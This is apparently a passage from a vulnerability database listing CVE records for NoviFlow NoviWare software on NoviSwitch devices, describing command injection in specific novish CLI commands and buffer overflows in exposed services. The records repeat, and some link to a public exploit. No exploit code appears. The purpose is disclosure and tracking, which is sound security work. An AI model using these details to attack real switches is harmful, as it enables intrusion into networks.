        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the \"show status destination ipaddr\" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing",
              "refsource": "MISC",
              "url": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2020-13122",
    "datePublished": "2020-08-17T15:59:25",
    "dateReserved": "2020-05-16T00:00:00",
    "dateUpdated": "2024-08-04T12:11:18.611Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2017-12787 (GCVE-0-2017-12787)

Vulnerability from nvd – Published: 2017-08-22 17:00 – Updated: 2024-08-05 18:51
Summary
A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
https://www.exploit-db.com/exploits/42518/ (tags: exploit, x_refsource_EXPLOIT-DB)

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T18:51:07.224Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "42518",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/42518/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-08-22T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-22T16:57:02",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "42518",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/42518/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-12787",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "42518",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/42518/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-12787",
    "datePublished": "2017-08-22T17:00:00",
    "dateReserved": "2017-08-10T00:00:00",
    "dateUpdated": "2024-08-05T18:51:07.224Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2017-12786 (GCVE-0-2017-12786)

Vulnerability from nvd – Published: 2017-08-22 17:00 – Updated: 2024-08-05 18:51
Summary
Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
https://www.exploit-db.com/exploits/42518/ (tags: exploit, x_refsource_EXPLOIT-DB)

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T18:51:06.333Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "42518",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/42518/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-08-22T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-22T16:57:02",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "42518",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/42518/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-12786",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "42518",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/42518/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-12786",
    "datePublished": "2017-08-22T17:00:00",
    "dateReserved": "2017-08-10T00:00:00",
    "dateUpdated": "2024-08-05T18:51:06.333Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2017-12785 (GCVE-0-2017-12785)

Vulnerability from nvd – Published: 2017-08-22 17:00 – Updated: 2024-08-05 18:51
Summary
The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the "show log cli" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
https://www.exploit-db.com/exploits/42518/ (tags: exploit, x_refsource_EXPLOIT-DB)

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T18:51:06.170Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "42518",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/42518/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-08-22T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the \"show log cli\" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-22T16:57:02",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "42518",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/42518/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-12785",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the \"show log cli\" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "42518",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/42518/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-12785",
    "datePublished": "2017-08-22T17:00:00",
    "dateReserved": "2017-08-10T00:00:00",
    "dateUpdated": "2024-08-05T18:51:06.170Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2020-13122 (GCVE-0-2020-13122)

Vulnerability from cvelistv5 – Published: 2020-08-17 15:59 – Updated: 2024-08-04 12:11
Summary
The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the "show status destination ipaddr" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T12:11:18.611Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2020-06-17T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the \"show status destination ipaddr\" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-08-17T15:59:25",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2020-13122",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the \"show status destination ipaddr\" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing",
              "refsource": "MISC",
              "url": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2020-13122",
    "datePublished": "2020-08-17T15:59:25",
    "dateReserved": "2020-05-16T00:00:00",
    "dateUpdated": "2024-08-04T12:11:18.611Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2017-12785 (GCVE-0-2017-12785)

Vulnerability from cvelistv5 – Published: 2017-08-22 17:00 – Updated: 2024-08-05 18:51
Summary
The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the "show log cli" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
https://www.exploit-db.com/exploits/42518/ (tags: exploit, x_refsource_EXPLOIT-DB)

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T18:51:06.170Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "42518",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/42518/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-08-22T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the \"show log cli\" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-22T16:57:02",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "42518",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/42518/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-12785",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the \"show log cli\" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "42518",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/42518/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-12785",
    "datePublished": "2017-08-22T17:00:00",
    "dateReserved": "2017-08-10T00:00:00",
    "dateUpdated": "2024-08-05T18:51:06.170Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2017-12787 (GCVE-0-2017-12787)

Vulnerability from cvelistv5 – Published: 2017-08-22 17:00 – Updated: 2024-08-05 18:51
Summary
A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
https://www.exploit-db.com/exploits/42518/ (exploit, x_refsource_EXPLOIT-DB)

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T18:51:07.224Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "42518",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/42518/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-08-22T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-22T16:57:02",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "42518",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/42518/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-12787",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "42518",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/42518/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-12787",
    "datePublished": "2017-08-22T17:00:00",
    "dateReserved": "2017-08-10T00:00:00",
    "dateUpdated": "2024-08-05T18:51:07.224Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2017-12786 (GCVE-0-2017-12786)

Vulnerability from cvelistv5 – Published: 2017-08-22 17:00 – Updated: 2024-08-05 18:51
Summary
Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
https://www.exploit-db.com/exploits/42518/ (exploit, x_refsource_EXPLOIT-DB)

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T18:51:06.333Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "42518",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/42518/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-08-22T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-22T16:57:02",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "42518",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/42518/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-12786",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "42518",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/42518/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-12786",
    "datePublished": "2017-08-22T17:00:00",
    "dateReserved": "2017-08-10T00:00:00",
    "dateUpdated": "2024-08-05T18:51:06.333Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}